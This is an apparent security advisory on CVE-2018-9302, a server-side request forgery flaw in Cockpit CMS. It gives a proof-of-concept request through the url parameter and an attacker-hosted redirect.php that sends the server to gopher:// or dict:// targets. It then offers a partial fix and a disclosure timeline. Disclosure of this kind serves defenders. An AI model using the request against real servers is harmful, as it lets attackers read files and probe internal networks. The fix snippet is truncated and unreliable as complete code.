Cockpit CMS 0.4.4 < 0.5.5 CVE-2018-9302 - Server-Side Request Forgery

Authors:Qian Wu, Bo Wang, Jiawang Zhang    Risk:High

CVE:CVE-2018-9302                         0day:SSEF 

0day -id:0DAY-176134                       Date:2018-05-03


SSRF (Server Side Request Forgery) in /assets/lib/fuc.js.php in Cockpit 0.4.4 through 0.5.5 allows remote attackers to read arbitrary files or send TCP traffic to intranet hosts via the url parameter. NOTE: this vulnerability exists because of an incomplete fix for CVE-2017-14611, which was about version 0.13.0, which (surprisingly) is an earlier version than 0.4.4.


GET /assets/lib/fuc.js.php?url=http://myserver/redirect.php HTTP/1.1
    Host: myserver
    Connection: close
    Cache-Control: max-age=0
    Upgrade-Insecure-Requests: 1
    User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/59.0.3071.115 Safari/537.36
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
    Accept-Language: zh-CN,zh;q=0.8
Modify the redirect.php file on the attacker's server.example:
    <?php Header("Location: gopher://");?>
If the curl function is available,then use gopher、tftp、http、https、dict、ldap、imap、pop3、smtp、telnet protocols method,if not then only use http、https、ftp protocol
scan prot,example: <?php Header("Location: dict://");?> 
If the curl function is unavailable,this vulnerability trigger need allow_url_fopen option is enable in php.ini,allow_url_fopen option defualt is enable.

Fix Code

The fix code example:
    $url     = $_REQUEST['url'];
    $content = null;
    if (!filter_var($url, FILTER_VALIDATE_URL)) {
        header('HTTP/1.0 400 Bad Request');
    // allow only http requests
    if (!preg_match('#^http(|s)\://#', $url)) {
        header('HTTP/1.0 403 Forbidden');
    preg_match('/https*:\/\/(.+)/', $url, $matches);
    $host= count($matches) > 1 ? $matches[1] : '';
    $ip = gethostbyname($host);
    //check private ip
and modify the line 48 :
    curl_setopt($conn, CURLOPT_FOLLOWLOCATION, 0);


2018-04-03 Found Cockpit CMS vulnerability.
2018-04-04 Submit vulnerability information to developers.
2018-04-05 Submit CVE-ID request
2018-04-28 Vendor no response, Public vulnerability information,Please Fix it.

Leave a Reply